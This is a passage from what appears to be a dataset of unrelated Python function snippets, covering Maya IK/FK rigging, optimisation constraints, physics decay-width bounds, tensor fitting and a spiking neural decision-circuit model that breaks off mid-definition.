cmds.scaleConstraint(root_control, ik_joints_offset, mo=True)\n\n # Connect twisting and pole vector control\n cmds.addAttr(goal_control, ln='twist', at='float', k=True)\n cmds.connectAttr('{}.twist'.format(goal_control), '{}.twist'.format(handle))\n cmds.poleVectorConstraint(pole_control, handle)\n\n # Add PV visibility attribute\n cmds.addAttr(goal_control, shortName='pv', longName='poleVector', at='bool', k=True)\n cmds.connectAttr('{}.pv'.format(goal_control), '{}.v'.format(pole_control))\n cmds.setAttr('{}.pv'.format(goal_control),1)\n\n # Add curve that points elbow to pole control\n crv = cmds.curve(p=[[0, 0, 0], [0, 1, 0]], d=1)\n cmds.connectAttr('{}.visibility'.format(pole_control), '{}.visibility'.format(crv))\n lock_hide_attrs(crv, attrs=['tx', 'ty', 'tz', 'rx', 'ry', 'rz', 'sx', 'sy', 'sz'])\n cmds.setAttr('{}.overrideEnabled'.format(crv), True)\n cmds.setAttr('{}.overrideDisplayType'.format(crv), 2)\n decomp_joint = cmds.createNode('decomposeMatrix')\n decomp_control = cmds.createNode('decomposeMatrix')\n cmds.connectAttr('{}.worldMatrix'.format(joints[1]), '{}.inputMatrix'.format(decomp_joint))\n cmds.connectAttr('{}.worldMatrix'.format(pole_control), '{}.inputMatrix'.format(decomp_control))\n cmds.connectAttr('{}.outputTranslate'.format(decomp_joint), '{}.controlPoints[0]'.format(crv))\n cmds.connectAttr('{}.outputTranslate'.format(decomp_control), '{}.controlPoints[1]'.format(crv))\n\n return handle, crv, exp_tf_ms", "def __init__(self, dim, kinetic: Tuple[int] or Model = (128, 128), potential: Tuple[int] or Model = (128, 128)):\n self.kinetic = _mlp_models(dim, kinetic, \"softplus\", name=\"Kinetic\")\n self.potential = _mlp_models(dim, potential, \"softplus\", name=\"Potential\")\n self.dim = dim", "def test_creation_softbounds():\n value = -42\n softbounds = [-100, 100]\n num_a = param.Integer(value=value, softbounds=softbounds)\n assert num_a.value == value\n assert num_a.softbounds == softbounds", "def constraint(self, c):\n self.add_constraint(c)", "def pre_network_ipam_create(self, resource_dict):\n pass", "def pre_network_policy_create(self, resource_dict):\n pass", "def pre_virtual_ip_create(self, resource_dict):\n 
pass", "def ikfkMechanics(module, extraName, jnts, mechSkelGrp, ctrlGrp, moduleType, rig):\n jntSuffix = suffix['joint']\n newJntChains = []\n ## create duplicate chains\n for chain in ['IK', 'FK']:\n newJnts = utils.duplicateJntChain(chain, jnts, parent=mechSkelGrp.name)\n newJntChains.append(newJnts)\n ikJnts = newJntChains[0]\n fkJnts = newJntChains[1]\n for i, each in enumerate(jnts):\n newName = '{}_result{}'.format(each.rsplit('_', 1)[0], jntSuffix)\n jnts[i] = cmds.rename(each, newName)\n # utils.addJntToSkinJnt(jnts[i], rig=rig)\n ## settings control\n module.settingCtrl = ctrlFn.ctrl(name='{}{}Settings'.format(extraName, moduleType),\n guide='{}{}Settings{}'.format(module.moduleName,\n moduleType, suffix['locator']),\n deleteGuide=True, side=module.side, skipNum=True,\n parent=module.rig.settingCtrlsGrp.name,\n scaleOffset=rig.scaleOffset, rig=rig)\n if moduleType == 'arm':\n settingJnt = jnts[3]\n else:\n settingJnt = jnts[2]\n module.settingCtrl.makeSettingCtrl(ikfk=True, parent=settingJnt)\n ## parent constraints\n for jnt, ikJnt, fkJnt in zip(jnts, ikJnts, fkJnts):\n parConstr = cmds.parentConstraint(ikJnt, fkJnt, jnt)\n cmds.connectAttr(module.settingCtrl.ctrl.ikfkSwitch, '{}.{}W1'.format(parConstr[0], fkJnt))\n swRev = utils.newNode('reverse', name='{}{}IKFKSw'.format(extraName, moduleType),\n side=module.side)\n swRev.connect('inputX', module.settingCtrl.ctrl.ikfkSwitch, mode='to')\n swRev.connect('outputX', '{}.{}W0'.format(parConstr[0], ikJnt), mode='from')\n ## control vis groups\n ikCtrlGrp = utils.newNode('group', name='{}{}IKCtrls'.format(extraName, moduleType),\n side=module.side, parent=ctrlGrp.name, skipNum=True)\n fkCtrlGrp = utils.newNode('group', name='{}{}FKCtrls'.format(extraName, moduleType),\n side=module.side, parent=ctrlGrp.name, skipNum=True)\n cmds.setDrivenKeyframe(ikCtrlGrp.name, at='visibility',\n cd=module.settingCtrl.ctrl.ikfkSwitch, dv=0.999, v=1)\n cmds.setDrivenKeyframe(ikCtrlGrp.name, at='visibility',\n cd=module.settingCtrl.ctrl.ikfkSwitch, dv=1, v=0)\n cmds.setDrivenKeyframe(fkCtrlGrp.name, at='visibility',\n cd=module.settingCtrl.ctrl.ikfkSwitch, dv=0.001, v=1)\n cmds.setDrivenKeyframe(fkCtrlGrp.name, at='visibility',\n cd=module.settingCtrl.ctrl.ikfkSwitch, dv=0, v=0)\n return ikJnts, fkJnts, jnts, ikCtrlGrp, fkCtrlGrp", "def add_constraint(self, kind, hook, expr, queue=False,**kwargs):\n\n if isinstance(expr, GenericVariable):\n # make sure we actually pass the optlang variable\n expr = expr.variable\n\n # Initialisation links to the cobra_model\n cons = kind(hook, expr, # problem = self.problem,\n # lb=lower_bound if lower_bound != float('-inf') else None,\n # ub=upper_bound if upper_bound != float('inf') else None,\n queue=queue,\n **kwargs)\n self._cons_dict[cons.name] = cons\n self.logger.debug('Added constraint: {}'.format(cons.name))\n # self.add_cons_vars(cons.constraint)\n\n return cons", "def soft_validation(self, soft_validation):\n\n self._soft_validation = soft_validation", "def soft_validation(self, soft_validation):\n\n self._soft_validation = soft_validation", "def _create_softmax(cls, onnx_node, inputs, opset_version):\n factor = onnx_node.getattr('axis', 1)\n if factor < 0:\n # in order to support the negative axis\n factor = len(inputs[0].shape) + factor\n _, forward = cls._common_onnx_node_to_singa_op(onnx_node, inputs,\n opset_version)\n return None, forward(axis=factor)", "def constraint_k_pi_invis(self):\n width_contr = 0.0\n ms = self.ms\n\n # Make sure scalar mass doesn't fall outside of kinematic bounds\n if 
np.any([s[0] <= ms**2 <= s[1] for s in k_pi_invis_obs.s_bounds]):\n widths_s = self.partial_widths()\n width_s = widths_s[\"total\"]\n width_s_sm = width_s - widths_s[\"x x\"] # Gamma_{S->SM}\n\n # Magnitude of S' 3-momentum\n ps = np.sqrt(\n (mk - mpi - ms) * (mk + mpi - ms) * (mk - mpi + ms) * (mk + mpi + ms)\n ) / (2.0 * mk)\n # Probability that S decays outside the detector\n pr_invis = np.exp(-k_pi_invis_obs.r_max * cm_to_inv_MeV * width_s * ms / ps)\n\n # Compute the total contribution to the invisible decay width\n width_contr = (\n self.width_k_pi_s() * (widths_s[\"x x\"] + pr_invis * width_s_sm) / width_s\n )\n\n return k_pi_invis_obs.width_bound - width_contr", "def ikHandleCtx(*args, autoPriorityH: bool=True, createCurve: bool=True, createRootAxis:\n bool=True, exists: bool=True, forceSolverH: bool=True, history: bool=True,\n image1: Union[AnyStr, bool]=\"\", image2: Union[AnyStr, bool]=\"\", image3:\n Union[AnyStr, bool]=\"\", name: AnyStr=\"\", numSpans: int=1, parentCurve:\n bool=True, poWeightH: Union[float, bool]=1, priorityH: Union[int, bool]=1,\n rootOnCurve: bool=True, rootTwistMode: bool=True, simplifyCurve: bool=True,\n snapCurve: bool=True, snapHandleH: bool=True, solverTypeH: Union[AnyStr,\n bool]=\"\", stickyH: Union[AnyStr, bool]=\"off\", twistType: AnyStr=\"linear\",\n weightH: Union[float, bool]=1, q=True, query=True, e=True, edit=True,\n **kwargs)->Union[AnyStr, Any]:\n pass", "def __init__(self, constraint: ConstraintExpr):\n self.constraint = constraint", "def create_dummy_expression(penalty_variable, constraint_variable):\n return expression.ExplicitExpression(\n basic_expression.BasicExpression([term.TensorTerm(penalty_variable)]),\n basic_expression.BasicExpression(\n [term.TensorTerm(constraint_variable)]))", "def test_create_hyperflex_ext_iscsi_storage_policy(self):\n pass", "def pre_floating_ip_create(self, resource_dict):\n pass", "def test_create_hyperflex_software_version_policy(self):\n pass", "def test_patch_hyperflex_auto_support_policy(self):\n pass", "def add_constraint(self, constraint):\n self._ckey += 1\n self.constraints[self._ckey] = constraint", "def pre_floating_ip_pool_create(self, resource_dict):\n pass", "def fit_DTI_signal(sig, x, weighted=False, x_pinv=None, is_log_sig=False, h_hat=None, inv_levs=None):\n if is_log_sig:\n y = sig\n else:\n #log SIGNAL\n #this assumes that sig is strictly positive!!!!\n try:\n y = np.log(sig)\n except RuntimeWarning as rw:\n print 'ERROR FIT: non-positive value in signal'\n print rw, '\\nsignal', sig\n raise rw\n #beta0=np.linalg.lstsq(DESIGNMATRIX,y)[0]\n #pseudo inverse z = (DESIGNMATRIX*xT)^(-1)*xT\n if x_pinv is None:\n z = designmatrix_pseudoinverse(x)\n else:\n z = x_pinv\n #compute hat matrix H diagonal, H = DESIGNMATRIX*z\n #in whitcher et al 2008 the H_diagonal is computed from the OLS regression\n if h_hat is None:\n H_diag = np.diagonal(np.dot(x, z))\n else:\n H_diag = h_hat\n #beta0 is the least squares fit result, beta0 = z*y\n beta0 = np.dot(z, y)\n if weighted:\n #generate synthetic SIGNAL\n try:\n Sg = np.exp(np.dot(x, beta0))\n except RuntimeWarning as rw:\n print 'ERROR FIT: generating synthetic signal'\n print rw, '\\ndesign matrix',x, '\\ntensor OLS fit' , beta0\n raise rw\n \n #compute weight matrix W\n try:\n W = generate_weights(Sg)\n except RuntimeWarning as rw:\n print 'ERROR FIT: generating weights'\n print rw, '\\nsynthetic signal', Sg\n raise rw\n #do IS_WEIGHTED fit \n #z = designmatrix_pseudoinverse(x, W) 
#np.dot(np.dot(np.linalg.inv(np.dot(DESIGNMATRIX.T,np.dot(W,DESIGNMATRIX))),DESIGNMATRIX.T),W)\n #beta is the final IS_WEIGHTED matrix\n #beta = np.dot(z, y)\n #linalg.lstsq wraps the function lapack_lite.dgelsd see some information on lapack dgelsd... That explains why the linalg calls the routine twice\n# LWORK (input) INTEGER\n# The dimension of the array WORK. LWORK must be at least 1. \n# The exact minimum amount of workspace needed depends on M, N and NRHS. \n# As long as LWORK is at least 12*N + 2*N*SMLSIZ + 8*N*NLVL + N*NRHS + (SMLSIZ+1)**2, \n# if M is greater than or equal to N or 12*M + 2*M*SMLSIZ + 8*M*NLVL + M*NRHS + (SMLSIZ+1)**2, \n# if M is less than N, the code will execute correctly. \n# SMLSIZ is returned by ILAENV and is equal to the maximum size of the subproblems at \n# the bottom of the computation tree (usually about 25), and NLVL = MAX( 0, INT( LOG_2( MIN( M,N )/(SMLSIZ+1) ) ) + 1 ) \n# For good performance, LWORK should generally be larger. \n# If LWORK = -1, then a workspace query is assumed; \n# the routine only calculates the optimal size of the WORK array, returns this value as the first entry of \n# the WORK array, and no error message related to LWORK is issued by XERBLA. \n# IWORK (workspace) INTEGER array, dimension (MAX(1,LIWORK)) LIWORK >= 3 * MINMN * NLVL + 11 * MINMN, where MINMN = MIN( M,N ). \n #tfit = np.linalg.lstsq(np.dot(x.T, np.dot(W,x)), np.dot(x.T, np.dot(W, y)))[0]\n #use faster diagonal matrix mul routine\n tmpfac = mult_diag(W, x.T, False)\n# tfit = np.linalg.lstsq(np.dot(tmpfac, x), np.dot(tmpfac, y))[0]\n try:\n tfit = np.linalg.solve(np.dot(tmpfac, x), np.dot(tmpfac, y))\n except np.linalg.LinAlgError as e:\n tfit = np.linalg.lstsq(np.dot(tmpfac, x), np.dot(tmpfac, y))[0]\n print 'fit_DTI_signal: Warning using lstsq', e\n# print e, '\\ntensor fit', f_s[0]\n else:\n tfit = beta0\n #compute hat matrix H diagonal, H = DESIGNMATRIX*z\n #in whitcher et al 2008 the H_diagonal is computed from the OLS regression\n #H_diag = np.diagonal(np.dot(x, z))\n #compute MU\n mu = np.dot(x, tfit)\n #compute log residuals\n errors = y-mu\n if inv_levs is None:\n try:\n \n #the resampling is only done on the gradient directions, not on the logS component!\n inv_levs = np.ones(errors.shape)\n inv_levs[1:] = 1./np.sqrt(1.-H_diag[1:]) \n \n except RuntimeWarning as rw2:\n print 'ERROR FIT: leveraged errors'\n print rw2, '\\nHat matrix diagonal', H_diag\n inv_levs = np.ones(errors.shape)\n raise rw2\n lev_errors = errors*inv_levs \n return (tfit, mu, errors, H_diag, lev_errors)", "def constraint_B_k_invis(self):\n ms = self.ms\n width_contr = 0.0\n\n # Make sure scalar mass doesn't fall outside of kinematic bounds\n if np.any([s[0] <= ms**2 <= s[1] for s in B_k_invis_obs.s_bounds]):\n widths_s = self.partial_widths()\n width_s = widths_s[\"total\"]\n width_s_sm = width_s - widths_s[\"x x\"] # Gamma_{S->SM}\n\n # Magnitude of S' 3-momentum\n ps = np.sqrt(\n (mB - mk - ms) * (mB + mk - ms) * (mB - mk + ms) * (mB + mk + ms)\n ) / (2.0 * mB)\n # Probability that S decays outside the detector\n pr_invis = np.exp(-B_k_invis_obs.r_max * cm_to_inv_MeV * width_s * ms / ps)\n\n # Compute the total contribution to the invisible decay width\n width_contr = (\n self.width_B_k_s() * (widths_s[\"x x\"] + pr_invis * width_s_sm) / width_s\n )\n\n return B_k_invis_obs.width_bound - width_contr", "def constraints(self):\n # Turn softmax output to categories.\n predictions = (1 + tf.sign(self.predictions)) / 2\n\n # Set the constraint to zero.\n self.constraint = 0\n ct = 
list()\n\n # Compute DIDI constraint.\n for I in self.I_train:\n N = tf.reduce_sum(tf.cast(I >= 0, dtype=tf.float32))\n Np = tf.reduce_sum(I)\n a = (tf.reduce_sum(predictions) / N)\n b = (tf.reduce_sum(I * predictions) / Np)\n\n tmp = tf.cond(Np > 0, lambda: 2 * (a - b), lambda: 0.0)\n ct.append(tf.abs(tmp))\n\n # ConstrainedMinimizationProblems must always provide their constraints in\n # the form (tensor <= 0).\n # return self.constraint - self.constraint_value\n return sum(ct) - self.constraint_value", "def soft_update(self, other, tau):\n new_weights = {}\n\n own_weights = self.get_weight_copies()\n other_weights = other.get_weight_copies()\n\n for k in own_weights:\n #print(own_weights[k].shape, other_weights[k].shape)\n new_weights[k] = (1 - tau) * own_weights[k] + tau * other_weights[k]\n self.set_weights(new_weights)", "def _discretize(self, constraints_object):\n pass", "def constraint_val(self, input_val_dict):\n\n sess = tf.get_default_session()\n feed_dict = self.create_feed_dict(input_val_dict)\n constrain_val = sess.run(self._constraint_objective, feed_dict)\n return constrain_val", "def _createConstraint(self, dvIndex, compIDs, lbound, ubound):\n size = self.comm.size\n rank = self.comm.rank\n # Gather the dv mapping from each proc\n globalToLocalDVNumsOnProc = self.comm.gather(self.globalToLocalDVNums, root=0)\n # Assemble constraint info on root proc\n if rank == 0:\n # Create a list of lists that will hold the sparse data info on each proc\n rowsOnProc = [[] for _ in range(size)]\n colsOnProc = [[] for _ in range(size)]\n valsOnProc = [[] for _ in range(size)]\n conCount = 0\n foundCompPairs = []\n # Loop through all adjacent component pairs\n for compPair in self.adjacentComps:\n # Check if they are in the user provided compIDs\n if compPair[0] in compIDs and compPair[1] in compIDs:\n # Add comp pair to list\n foundCompPairs.append(compPair)\n # We found a new constraint\n for i, comp in enumerate(compPair):\n # Get the TACS element object associated with this compID\n elemObj = self.meshLoader.getElementObject(comp, 0)\n elemIndex = 0\n # Get the dvs owned by this element\n globalDvNums = elemObj.getDesignVarNums(elemIndex)\n # Check if specified dv num is owned by each proc\n for proc_i in range(size):\n globalToLocalDVNums = globalToLocalDVNumsOnProc[proc_i]\n if globalDvNums[dvIndex] in globalToLocalDVNums:\n globalDVNum = globalDvNums[dvIndex]\n localDVNum = globalToLocalDVNums[globalDVNum]\n rowsOnProc[proc_i].append(conCount)\n colsOnProc[proc_i].append(localDVNum)\n if i == 0:\n valsOnProc[proc_i].append(1.0)\n else:\n valsOnProc[proc_i].append(-1.0)\n break\n conCount += 1\n\n else:\n rowsOnProc = None\n colsOnProc = None\n valsOnProc = None\n conCount = 0\n foundCompPairs = None\n\n # Scatter local sparse indices/values to remaining procs\n rows = self.comm.scatter(rowsOnProc, root=0)\n cols = self.comm.scatter(colsOnProc, root=0)\n vals = self.comm.scatter(valsOnProc, root=0)\n\n # Get local sparse matrix dimensions\n foundCompPairs = self.comm.bcast(foundCompPairs, root=0)\n conCount = self.comm.bcast(conCount, root=0)\n nLocalDVs = self.getNumDesignVars()\n\n constrObj = SparseLinearConstraint(\n self.comm, rows, cols, vals, conCount, nLocalDVs, lbound, ubound\n )\n constrObj.compPairs = foundCompPairs\n\n # Create linear constraint object\n return constrObj", "def ineqconstr(x, problem):\n x, t_final = matrify(x, problem)\n c = []\n\n # inter vehicles\n c += [veh_coll_avoid(x[:, :2, v1], x[:, :2, v2], problem)\n for v1 in range(problem['Nv']) for v2 in 
range(v1 + 1, problem['Nv'])]\n\n # obstacles\n c += [obs.avoid(x[:, :2, veh]) for obs in problem['obstacles'] for veh in range(problem['Nv'])]\n return np.concatenate(c) if c else np.array([])", "def test_creation_set_softbounds_get_softbounds():\n value = 42\n softbounds = [-100, 100]\n\n num_a = param.Integer(value=value, softbounds=softbounds)\n assert num_a.softbounds == softbounds\n assert num_a.get_soft_bounds() == softbounds", "def get_Amn_one_k(self, ik):\n raise NotImplementedError(\n \"The get_Amn_one_k method is should be overrided.\")", "def ik_to_fk(node):\n ik_main_off = get_parent(node.ik_main_conn)\n fk_01_off = get_parent(node.fk_01_conn)\n fk_02_off = get_parent(node.fk_02_conn)\n fk_03_off = get_parent(node.fk_03_conn)\n\n ik_main_world_trans = get_world_trans(node.ik_main_conn)\n fk_01_world_trans = get_world_trans(node.fk_01_conn)\n ik_main_off_world_trans = get_world_trans(ik_main_off)\n fk_01_off_world_trans = get_world_trans(fk_01_off)\n fk_02_off_world_trans = get_world_trans(fk_02_off)\n fk_03_off_world_trans = get_world_trans(fk_03_off)\n\n # calculate base information\n def_len = (ik_main_off_world_trans - fk_01_off_world_trans).length()\n\n # Calculate ik direction\n ik_dir_01 = ik_main_off_world_trans - fk_01_off_world_trans\n ik_dir_02 = ik_main_world_trans - fk_01_world_trans\n\n ik_dir_rot = ik_dir_01.rotateTo(ik_dir_02).asEulerRotation()\n\n # Apply ik direction -> important to calculate correct pole rotations\n fk_01_rot_plugs = get_rot_plugs(node.fk_01_conn)\n for i, plug in enumerate(fk_01_rot_plugs):\n plug.setMAngle(oMa.MAngle(ik_dir_rot[i], oMa.MAngle.kRadians))\n\n # Calculate ik pole rotations\n ik_pole_world_mat = get_world_matrix(node.ik_pole_conn, 0)\n fk_03_world_inv_mat = get_world_inv_matrix(node.fk_01_conn, 0)\n\n ik_pole_rot_mat = ik_pole_world_mat * fk_03_world_inv_mat\n\n ik_pole_vec = oMa.MTransformationMatrix(ik_pole_rot_mat).translation(oMa.MSpace.kWorld)\n ik_pole_vec.y = 0\n\n ik_pole_rot = oMa.MVector.kZaxisVector.rotateTo(ik_pole_vec).asEulerRotation()\n\n # Calculate ik rotations\n tri_a_len = (fk_02_off_world_trans - fk_01_off_world_trans).length()\n tri_b_len = (fk_03_off_world_trans - fk_02_off_world_trans).length()\n tri_c_len = (ik_main_world_trans - fk_01_world_trans).length()\n\n if tri_c_len >= def_len:\n fk_02_angle = 0\n fk_01_angle = 0\n else:\n fk_02_angle = math.pi - solve_triangle(tri_a_len, tri_b_len, tri_c_len, \"C\")\n fk_01_angle = -solve_triangle(tri_a_len, tri_b_len, tri_c_len, \"B\")\n\n # Add rotations together\n fk_01_temp = oMa.MEulerRotation(fk_01_angle, ik_pole_rot.y, 0)\n\n ik_dir_mat = compose_mat(ik_dir_rot)\n fk_01_mat = compose_mat(fk_01_temp)\n rot_mat = fk_01_mat * ik_dir_mat\n\n # Apply everything\n fk_01_rot = get_rot_from_mat(rot_mat)\n fk_02_rot = (fk_02_angle, 0, 0)\n\n fk_01_rot_plugs = get_rot_plugs(node.fk_01_conn)\n for i, plug in enumerate(fk_01_rot_plugs):\n plug.setMAngle(oMa.MAngle(fk_01_rot[i], oMa.MAngle.kRadians))\n\n fk_02_rot_plugs = get_rot_plugs(node.fk_02_conn)\n for i, plug in enumerate(fk_02_rot_plugs):\n if not plug.isLocked:\n plug.setMAngle(oMa.MAngle(fk_02_rot[i], oMa.MAngle.kRadians))\n\n # Calculate ankle rotation\n fk_03_rot = rot_world_space_to_local_space(node.ik_main_conn, get_parent(node.fk_03_conn))\n\n fk_03_rot_plugs = get_rot_plugs(node.fk_03_conn)\n for i, plug in enumerate(fk_03_rot_plugs):\n plug.setMAngle(oMa.MAngle(fk_03_rot[i], oMa.MAngle.kRadians))", "def G(self, (k,t), (j,x), **params):\n d = len(x)/2\n q,dq = x[:d],x[d:]\n J = (j == True)\n _J = 
np.logical_not(J)\n # number of constraints\n n = len(J) \n # number of active constraints\n m = np.sum(J) # = n - len(a)\n a = self.a( (k,t), (_J,q), **params)\n lambda_ = self.lambda_( (k,t), (J,q,dq), **params)\n # unilateral constraint forces\n lambda_ = lambda_[:m] \n g = np.nan*np.zeros(n)\n g[_J] = a\n g[J] = lambda_\n return g", "def test_tensor_terms_have_constraints(toy_interaction_X_y):\n X, y = toy_interaction_X_y\n gam = LinearGAM(te(0, 1, constraints='none')).fit(X, y)\n\n assert gam._is_fitted\n assert gam.terms.hasconstraint", "def pre_logical_interface_create(self, resource_dict):\n pass", "def createGridWarpNodeMI():\n return gy()", "def pre_physical_interface_create(self, resource_dict):\n pass", "def regularize_if_necessary(self) -> None:\n # As described in [wang2014], all entities and relations are used to compute the regularization term\n # which enforces the defined soft constraints.\n super().regularize_if_necessary(\n self.entity_embeddings.weight,\n self.normal_vector_embeddings.weight,\n self.relation_embeddings.weight,\n )", "def fixed(input_dim, K, variance=1.):\r\n part = parts.fixed.Fixed(input_dim, K, variance)\r\n return kern(input_dim, [part])", "def constrained_softmax(input_tensor, b, temp):\n\n # input_tensor = tf.reduce_mean(input_tensor)\n z = tf.reduce_sum(tf.exp(input_tensor / temp), axis=1, keep_dims=True)\n a = tf.exp(input_tensor / temp) * (b / temp) / z\n # a = tf.exp(input_tensor/temp) * b / z\n u = tf.ones_like(b) - b\n t_mask = tf.to_float(tf.less_equal(a, u))\n f_mask = tf.to_float(tf.less(u, a))\n A = a * t_mask\n U = u * f_mask\n\n csoftmax = A + U\n\n return csoftmax", "def apply_default_constraints(self):\n try:\n self.apply_secthresh(pipeline_weaksec(self.koi))\n except NoWeakSecondaryError:\n logging.warning('No secondary eclipse threshold set for {}'.format(self.koi))\n self.set_maxrad(default_r_exclusion(self.koi))", "def generate_powerset_bridge_constraints(problem):\n\n c_30 = _dynamic_constraint_30(problem)\n c_33 = _dynamic_constraint_33(problem)\n c_34 = _dynamic_constraint_34(problem)\n c_35 = _dynamic_constraint_35(problem)\n c_36 = _dynamic_constraint_36(problem)\n\n return c_30 & c_33 & c_34 & c_35 & c_36", "def addConstraint(self, constraint: Constraint, /) -> None:\n ...", "def ikSystem(*args, allowRotation: bool=True, autoPriority: bool=True, autoPriorityMC:\n bool=True, autoPrioritySC: bool=True, list: Union[List[int, int], bool]=None,\n snap: bool=True, solve: bool=True, solverTypes: bool=True, q=True, query=True,\n e=True, edit=True, **kwargs)->Union[AnyStr, Any]:\n pass", "def addConstraint(constraint, problem):\n problem += constraint", "def create_fixed_distance_constraint():\n return FixedDistanceConstraint()", "def constraint(self, constraint):\n\n self._constraint = constraint", "def pre_virtual_DNS_create(self, resource_dict):\n pass", "def mk_intcircuit(task_info):\n # -------------------------------------\n # Decision circuit parameters\n # -------------------------------------\n # populations\n N_E = task_info['dec']['populations']['N_E'] # number of exc neurons (1600)\n N_I = task_info['dec']['populations']['N_I'] # number of inh neurons (400)\n sub = task_info['dec']['populations']['sub'] # fraction of stim-selective exc neurons\n N_D1 = int(N_E * sub) # size of exc pop D1\n N_D2 = N_D1 # size of exc pop D2\n N_D3 = int(N_E * (1 - 2 * sub)) # size of exc pop D3, the rest\n\n # local recurrent connections\n w_p = task_info['dec']['connectivity']['w_p'] # relative synaptic strength of synapses within pop D1 
and D2\n w_m = 1 - sub * (w_p - 1) / (1 - sub) # relative synaptic strength of synapses across pop D1 and D2\n gEEa = task_info['dec']['connectivity']['gEEa'] # AMPA weight of EE synapses\n gEEn = task_info['dec']['connectivity']['gEEn'] # NMDA weight of EE synapses\n gEIa = task_info['dec']['connectivity']['gEIa'] # AMPA weight of EI synapses\n gEIn = task_info['dec']['connectivity']['gEIn'] # NMDA weight of EI synapses\n gIE = task_info['dec']['connectivity']['gIE'] # GABA weight of IE synapses, vs 1.3*nS from before\n gII = task_info['dec']['connectivity']['gII'] # GABA weight of II synapses\n d = task_info['dec']['connectivity']['delay'] # transmission delays of E synapses\n\n # external connections\n gXE = task_info['dec']['connectivity']['gXE'] # weight of XE (ext to exc) synapses\n gXI = task_info['dec']['connectivity']['gXI'] # weight of XI (ext to inh) synapses\n\n # neuron models\n CmE = task_info['dec']['neuron']['CmE'] # membrane capacitance of E neurons\n CmI = task_info['dec']['neuron']['CmI'] # membrane capacitance of I neurons\n gleakE = task_info['dec']['neuron']['gleakE'] # leak conductance of E neurons\n gleakI = task_info['dec']['neuron']['gleakI'] # leak conductance of I neurons\n Vl = task_info['dec']['neuron']['Vl'] # resting potential\n Vt = task_info['dec']['neuron']['Vt'] # spiking threshold\n Vr = task_info['dec']['neuron']['Vr'] # reset potential\n tau_refE = task_info['dec']['neuron']['tau_refE'] # absolute refractory period of E neurons\n tau_refI = task_info['dec']['neuron']['tau_refI'] # absolute refractory period of I neurons\n nu_ext = task_info['dec']['neuron']['nu_ext'] # firing rate of ext Poisson input to D1 and D2\n nu_ext1 = task_info['dec']['neuron']['nu_ext1'] # firing rate of ext Poisson input to D3 and DI\n\n # synapse models\n VrevE = task_info['dec']['synapse']['VrevE'] # reversal potential for E synapses\n VrevI = task_info['dec']['synapse']['VrevI'] # reversal potential for I synapses\n tau_ampa = task_info['dec']['synapse']['tau_ampa'] # decay constant of AMPA conductances\n tau_gaba = task_info['dec']['synapse']['tau_gaba'] # decay constant of GABA conductances\n tau_nmda_d = task_info['dec']['synapse']['tau_nmda_d'] # decay constant of NMDA conductances\n tau_nmda_r = task_info['dec']['synapse']['tau_nmda_r'] # rise constant of NMDA conductances\n alpha_nmda = task_info['dec']['synapse']['alpha_nmda'] # saturation constant of NMDA conductances\n\n # namespace with params\n paramint = {'w_p': w_p, 'w_m': w_m, 'gEEa': gEEa, 'gEEn': gEEn, 'gEIa': gEIa, 'gEIn': gEIn,\n 'gIE': gIE, 'gII': gII, 'gXE': gXE, 'gXI': gXI, 'gleakE': gleakE, 'gleakI': gleakI,\n 'Vl': Vl, 'Vt': Vt, 'Vr': Vr, 'VrevE': VrevE, 'VrevI': VrevI, 'tau_ampa': tau_ampa,\n 'tau_gaba': tau_gaba, 'tau_nmda_d': tau_nmda_d, 'tau_nmda_r': tau_nmda_r, 'alpha_nmda': alpha_nmda,\n 'sub': sub, 'CmE': CmE, 'CmI': CmI}\n\n # numerical integration method\n nummethod = task_info['simulation']['nummethod']\n\n # -------------------------------------\n # Set up the model and connections\n # -------------------------------------\n # neuron equations\n eqsE = '''\n dV/dt = (-g_ea*(V-VrevE) - g_ent*(V-VrevE)/(1+exp(-V/mV*0.062)/3.57) - g_i*(V-VrevI) - (V-Vl)) / tau : volt (unless refractory)\n dg_ea/dt = -g_ea / tau_ampa : 1\n dg_i/dt = -g_i / tau_gaba : 1\n dg_en/dt = -g_en / tau_nmda_d + alpha_nmda * x_en *(1-g_en) : 1\n dx_en/dt = -x_en / tau_nmda_r : 1\n g_ent : 1\n tau = CmE/gleakE : second\n label : integer (constant)\n '''\n\n eqsI = '''\n dV/dt = (-g_ea*(V-VrevE) - 
g_entI*(V-VrevE)/(1+exp(-V/mV*0.062)/3.57) - g_i*(V-VrevI) - (V-Vl)) / tau : volt (unless refractory)\n dg_ea/dt = -g_ea/tau_ampa : 1\n dg_i/dt = -g_i/tau_gaba : 1\n g_entI = w_nmda * g_ent : 1\n g_ent : 1 (linked)\n w_nmda : 1\n tau = CmI/gleakI : second\n '''\n\n # setup of integration circuit\n decE = NeuronGroup(N_E, model=eqsE, method=nummethod, threshold='V>=Vt', reset='V=Vr',\n refractory=tau_refE, namespace=paramint, name='decE')\n decE1 = decE[:N_D1]\n decE2 = decE[N_D1:N_D1 + N_D2]\n decE3 = decE[-N_D3:]\n decE1.label = 1\n decE2.label = 2\n decE3.label = 3\n\n decI = NeuronGroup(N_I, model=eqsI, method=nummethod, threshold='V>=Vt', reset='V=Vr',\n refractory=tau_refI, namespace=paramint, name='decI')\n\n # weight according the different subgroups\n condsame = '(label_pre == label_post and label_pre != 3)'\n conddiff = '(label_pre != label_post and label_pre != 3) or (label_pre == 3 and label_post != 3)'\n condrest = '(label_post == 3)'\n\n # NMDA: exc --> exc\n eqsNMDA = '''\n g_ent_post = w_nmda * g_en_pre : 1 (summed)\n w_nmda : 1 (constant)\n w : 1 (constant)\n '''\n\n synDEDEn = Synapses(decE, decE, model=eqsNMDA, method=nummethod, on_pre='x_en += w', delay=d,\n namespace=paramint, name='synDEDEn')\n synDEDEn.connect()\n synDEDEn.w['i == j'] = 1\n synDEDEn.w['i != j'] = 0\n synDEDEn.w_nmda[condsame] = 'w_p * gEEn/gleakE'\n synDEDEn.w_nmda[conddiff] = 'w_m * gEEn/gleakE'\n synDEDEn.w_nmda[condrest] = 'gEEn/gleakE'\n\n # NMDA: exc --> inh\n decI.w_nmda = '(gEIn/gleakI) / (gEEn/gleakE)'\n decI.g_ent = linked_var(decE3, 'g_ent', index=range(N_I))\n\n # AMPA: exc --> exc\n synDEDEa = Synapses(decE, decE, model='w : 1', method=nummethod,\n on_pre='g_ea += w', delay=d,\n namespace=paramint, name='synDEDEa')\n synDEDEa.connect()\n synDEDEa.w[condsame] = 'w_p * gEEa/gleakE'\n synDEDEa.w[conddiff] = 'w_m * gEEa/gleakE'\n synDEDEa.w[condrest] = 'gEEa/gleakE'\n\n # AMPA: exc --> inh\n synDEDIa = Synapses(decE, decI, model='w : 1', method=nummethod,\n on_pre='g_ea += w', delay=d,\n 